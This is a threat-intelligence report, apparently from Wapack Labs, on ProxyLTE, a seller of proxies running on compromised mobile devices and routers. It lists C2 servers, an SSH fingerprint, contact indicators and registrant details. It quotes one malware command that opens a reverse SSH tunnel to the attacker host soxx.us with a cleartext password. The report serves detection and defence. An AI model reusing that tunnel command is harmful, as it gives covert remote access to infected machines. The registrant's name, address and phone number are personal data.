Summary
ProxyLTE, a supplier of US based mobile and home router proxies, has been identified as one component in a large-scale fraud, targeting a Wapack Labs’ client. ProxyLTE.com was created in late 2017, however associated malware was first observed in 2013. This report includes details on ProxyLTE malware and associated infrastructure.
Background
Beginning in 2018, Wapack Labs began tracking botnet activity affecting a client. As part of this analysis, we profiled the traffic to identify command and control (C2) channels. A common thread among the botnet communications was a popular mobile game – Player Unknown Battleground (PUBG). Additional analysis revealed that many of the bots linked to PUBG were subsequently rented out by ProxyLTE. This connection indicates a larger supply chain of compromised mobile devices originating from PUBG gamers with ProxyLTE operating as a major reseller.
Details
ProxyLTE.com was first registered in October of 2017 and has since advertised on several hacking sites on both the surface and dark webs, as well as in IRC chatrooms frequented by hackers. Bot the mobile device and the home router proxies are offered for as little as $9 per day.
Figure 1: ProxyLTE Advertising
Figure 2: ProxyLTE Home Page
Wapack Labs obtained 46 mobile proxies from ProxyLTE as part of a trial. Our analysis revealed that over half of the proxies had made connections to Tencent’s PUBG chat endpoint at 49.51.42.110 within a 24 hour period, indicating the proxies were originally sourced from PUBG gamers. Additionally a total of 11 C2s were identified, all hosted by German hosting company Hetzner Online. All compromised proxies were either managed on ports 3665,3666, or 4996. Additional traffic was observed on 18080, which is the default port used for Monero cryptocurrency mining.
C2 Servers | Port(s) | ASN |
159.69.148.118 | 3665-3666 | Hetzner Online GmbH |
159.69.148.13 | 3665-3666 | Hetzner Online GmbH |
94.130.181.218 | 3665-3666 | Hetzner Online GmbH |
159.69.215.125 | 3665-3666 | Hetzner Online GmbH |
159.69.210.24 | 3665-3666 | Hetzner Online GmbH |
159.69.12.225 | 3665-3666 | Hetzner Online GmbH |
159.69.0.162 | 3665-3666 | Hetzner Online GmbH |
195.201.252.238 | 3665-3666 | Hetzner Online GmbH |
159.69.213.194 | 3665-3666 | Hetzner Online GmbH |
95.216.179.82 | 3665-3666 | Hetzner Online GmbH |
136.243.64.95 | 4996 | Hetzner Online GmbH |
Figure 3: Proxies obtained from ProxyLTE
The primary proxy endpoint provided in the ProxyLTE trial was 54.38.228.38, as shown in Figure 2. Passive DNS on this IP showed a record for infused.soxx.us. The soxx.us domain exposed a much larger infrastructure linked by soxx.us subdomains as well as the following SSH fingerprint
1a:04:f8:62:ab:0b:f8:18:5d:7e:26:a5:24:0a:c9:16
This additional infrastructure consists of over one hundred related domains and IPs. These domains and IPs were listed as C2 nodes in a number of malware specimens dating back to 2013. This included Windows executables and Android APKs, many of which appeared to be voice message applications, for example, “Craigslist-Voice-Message.exe” and “VoiceApp.apk.”
A recent malware sample revealed poor operational security with a cleartext SSH password observable in Virus Total[1].
C:\Net.Framework4.5.9873289a789fa987fas8da7s8998d897asdfa98fas87fds8a7g9678g678sg678s6fsd7890h898d7h\System.exe" -ssh -R 14650:127.0.0.1:7908 soxx.us -l sox2 -pw 906090lol
The following table lists available profile data involving ProxyLTE.
Indicator | Desription |
UIN 729425956 | ICQ Instant Messaging contact address. |
ProxyLTE@jabber.ru | Jabber contact Address. |
@ProxyLTE | Telegram contact Address |
soxxadm@gmail.com | Gmail contact address |
Proxylte.com | Primary website |
Proxylte.us | Secondary website – partially functioning |
paurel2211@gmail.com
| Registrant email for proxylte.us |
| Paul Aurel
| Registrant name for proxylte.us |
| 333 E 43rd StNew York NY 10017
| Registrant address for proxylte.us |
| +1.4843441009
| Registrant phone number for proxylte.us |
Conclusion
ProxyLTE is part of a larger trend of growing mobile proxy botnets. Starting in mid-2018, Wapack Labs observed the use of mobile device proxies in various botnet activity and large-scale industrial fraud. A compromised mobile device offers several advantages for attackers. For one, malware removal on mobile devices is far less common and much more difficult than regular computers. This means an attacker can get more mileage out of a single mobile device. Second, mobile devices are more likely to change IP addresses making IP blacklisting an unrealistic defense strategy.
As of the date of this report, ProxyLTE is one of a few providers of compromised mobile device proxies. Mobile device proxy rental is currently a lucrative business model since a newly recruited mobile device has very little chance of being blocked - a feature many will pay top dollar for. Wapack Labs also predicts the emergence of a ‘premium market’ of compromised mobile devices with the roll out of 5G as botnet herders can capitalize on the additional bandwidth.
Appendix A
The following table lists trending data on top IPs communicating with ProxyLTE IPs, with “COUNT” representing the number of proxies with which it was communicating. The PUBG Tencent IP, 49.51.42.110, was seen communicating with more than half of the proxies.
IP | CC | COUNT | ASN |
35.211.30.253 | US | 39 | AS19527 Google LLC |
35.211.120.82 | US | 32 | AS19527 Google LLC |
17.252.226.85 | US | 26 | AS714 Apple Inc. |
159.69.199.138 | US | 26 | AS24940 Hetzner Online GmbH |
209.58.147.67 | US | 25 | AS394380 Leaseweb USA, Inc. |
54.192.13.223 | US | 24 | AS16509 Amazon.com, Inc. |
54.192.13.179 | US | 24 | AS16509 Amazon.com, Inc. |
54.192.13.238 | US | 23 | AS16509 Amazon.com, Inc. |
54.192.13.110 | US | 22 | AS16509 Amazon.com, Inc. |
69.16.175.10 | US | 21 | AS20446 Highwinds Network Group, Inc. |
54.230.79.235 | US | 21 | AS16509 Amazon.com, Inc. |
49.51.42.110 | CN | 21 | AS132203 Tencent Building, Kejizhongyi Avenue |
35.227.238.95 | US | 21 | AS15169 Google LLC |
35.227.210.77 | US | 21 | AS15169 Google LLC |
205.185.216.42 | US | 21 | AS20446 Highwinds Network Group, Inc. |
205.185.216.10 | US | 21 | AS20446 Highwinds Network Group, Inc. |
35.241.16.93 | US | 20 | AS15169 Google LLC |
178.162.216.177 | DE | 20 | AS28753 Leaseweb Deutschland GmbH |
69.16.175.42 | US | 19 | AS20446 Highwinds Network Group, Inc. |
35.241.57.186 | US | 19 | AS15169 Google LLC |
[1]https://www.virustotal.com//#/file/976c29b5b7288d2901f0eba4cbae9bd9728e6e68f1b62112a438f74985017f94/behavior
Comments